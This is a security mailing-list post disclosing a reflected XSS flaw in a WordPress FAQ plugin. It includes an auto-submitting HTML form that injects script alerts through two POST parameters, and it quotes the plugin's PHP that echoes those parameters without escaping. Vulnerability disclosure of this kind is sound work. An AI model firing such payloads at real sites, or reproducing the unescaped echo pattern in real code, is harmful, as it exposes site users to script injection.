Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers
[<prev] [next>] [day] [month] [year] [list]
Date: Sat, 16 Apr 2016 14:01:20 +0530
From: shravan kumar <>
Subject: Unauthenticated XSS Vulnerability in WORDPRESS FAQ WD plugin 1.0.14.


I would like to report a Unauthenticated XSS vulnerability in FAQ WD
 plugin version 1.0.14 .

The Plugin can be found at

This Bug can be triggered by unauthenticated / Authenticated user. If a
user is sent a URL by social engineering and the user clicks the link the
bug can be triggred.

The URL should be something like this

The code for XSS_POC.html is as follows:

  <body onload="document.forms['xss'].submit()" >
    <form name="xss" action="
method="POST" >

  <input type="hidden" name="lang_err_mess" value="
<script>alert(1);</script>" />
<input type="hidden" name="lang_success_synchron" value="
<script>alert(2);</script>" />
      <input type="submit" value="Submit form" />

Techinical Details:

The vulnerable page is


This page can be directly accessed by anyone.

The Code responsible for the vulnerability :
<?php if (isset($_POST['lang_err_mess'])): ?>
    <div class="error" style="display: inline-block;width: 100%"><p><?php
echo $_POST['lang_err_mess']; ?></p></div>
<?php elseif (isset($_POST['lang_success'])): ?>
    <div class="updated" style="display: inline-block;width: 100%"><p><?php
echo 'File was successfully updated.'; ?></p></div>
<?php endif; ?>
<?php if (isset($_POST['lang_success_synchron'])): ?>
    <div class="updated" style="display: inline-block;width: 100%"><p><?php
echo $_POST['lang_success_synchron']; ?></p></div>
<?php endif; ?>

Here we can see that there are two post request which are displayed in
unsafe manner while rendering the page.

The vulnerable POST parameters are:

   - $_POST['lang_err_mess']
   - $_POST['lang_success_synchron']

Shravan Kumar

Powered by blists - more mailing lists

Your e-mail address:

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Powered by Openwall GNU/*/Linux - Powered by OpenVZ